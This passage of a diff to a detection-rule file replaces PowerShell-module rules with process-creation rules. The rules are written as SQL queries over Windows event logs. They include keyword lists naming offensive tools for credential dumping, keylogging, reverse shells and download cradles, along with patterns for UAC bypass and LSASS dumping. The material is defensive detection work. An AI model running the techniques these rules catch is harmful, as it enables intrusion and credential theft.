'%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_rundll.yml" + "filename": "proc_creation_win_msiexec_execute_dll.yml" }, { - "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module", - "id": "7034cbbb-cc55-4dc2-8dad-36c0b942e8f1", - "status": "experimental", - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "author": "Timur Zinniatullin, oscd.community", + "title": "UAC Bypass Using IEInstal - Process", + "id": "80fc36aa-945e-4181-89f2-2f907ab6775d", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%new-object%' ESCAPE '\\' AND Payload LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (Payload LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR Payload LIKE '%system.io.streamreader%' ESCAPE '\\') AND Payload LIKE '%readtoend' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\ieinstal.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "posh_pm_invoke_obfuscation_via_compress.yml" + "filename": "proc_creation_win_uac_bypass_ieinstal.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "Potential Persistence Attempt Via Existing Service Tampering", + "id": "38879043-7e1e-47a9-8d46-6bec88e201df", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.t1543.003", + "attack.t1574.011" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%config %' ESCAPE '\\' AND CommandLine LIKE '%binpath=%' ESCAPE '\\') OR (CommandLine LIKE '%sc %' ESCAPE '\\' AND CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command=%' ESCAPE '\\')) OR (((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%FailureCommand%' ESCAPE '\\') OR (CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%ImagePath%' ESCAPE '\\')) AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin$%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh$%' ESCAPE '\\' OR CommandLine LIKE '%.reg$%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + }, + { + "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", + "id": "044ba588-dff4-4918-9808-3f95e8160606", + "status": "experimental", + "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.credential_access" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", + "id": "56c217c3-2de2-479b-990f-5c109ba8458f", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", + "author": "Markus Neis, @Karneades", "tags": [ "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.s0111", + "attack.g0022", + "attack.g0060", + "car.2013-08-001", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", + "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "07aa184a-870d-413d-893a-157f317f6f58", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.discovery", "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Use of Forfiles For Execution", + "id": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Execute commands and binaries from the context of \"forfiles\". This is used as a LOLBIN for example to bypass application whitelisting.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use via a batch script or by an administrator." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR OriginalFileName = 'forfiles.exe') AND (CommandLine LIKE '% /p %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\') AND (CommandLine LIKE '% /m %' ESCAPE '\\' OR CommandLine LIKE '% -m %' ESCAPE '\\') AND (CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_clip.yml" + "filename": "proc_creation_win_lolbin_forfiles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module", - "id": "f3c89218-8c3d-4ba9-9974-f1d8e6a1b4a6", - "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Automated Collection Command Prompt", + "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "status": "test", + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.collection", + "attack.t1119", + "attack.credential_access", + "attack.t1552.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND ((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_var.yml" + "filename": "proc_creation_win_susp_automated_collection.yml" }, { - "title": "Suspicious PowerShell Download - PoshModule", - "id": "de41232e-12e8-49fa-86bc-c05c7e722df9", + "title": "Perl Inline Command Execution", + "id": "f426547a-e0f7-441a-b63e-854ac5bdf54d", "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "PowerShell scripts that download content from the Internet" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ContextInfo LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ContextInfo LIKE '%.DownloadFile(%' ESCAPE '\\' OR ContextInfo LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\perl.exe' ESCAPE '\\' OR OriginalFileName = 'perl.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "posh_pm_susp_download.yml" + "filename": "proc_creation_win_perl_inline_command_execution.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - PowerShell Module", - "id": "c72aca44-8d52-45ad-8f81-f96c4d3c755e", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "status": "test", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$?\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell Module", - "id": "88a22f69-62f9-4b8a-aa00-6b0212f2f05a", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%rundll32%' ESCAPE '\\' AND Payload LIKE '%shell32.dll%' ESCAPE '\\' AND Payload LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (Payload LIKE '%value%' ESCAPE '\\' OR Payload LIKE '%invoke%' ESCAPE '\\' OR Payload LIKE '%comspec%' ESCAPE '\\' OR Payload LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_rundll32.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Alternate PowerShell Hosts - PowerShell Module", - "id": "64e8e417-c19a-475a-8d19-98ea705394cc", + "title": "Microsoft Workflow Compiler Execution", + "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", "status": "test", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "author": "Nik Seetharaman, frack113", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1059.001" + "attack.t1127", + "attack.t1218" ], "falsepositives": [ - "Programs using PowerShell directly without invocation of a dedicated interpreter", - "MSP Detection Searcher", - "Citrix ConfigSync.ps1" + "Legitimate MWC use (unlikely in modern enterprise environments)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN 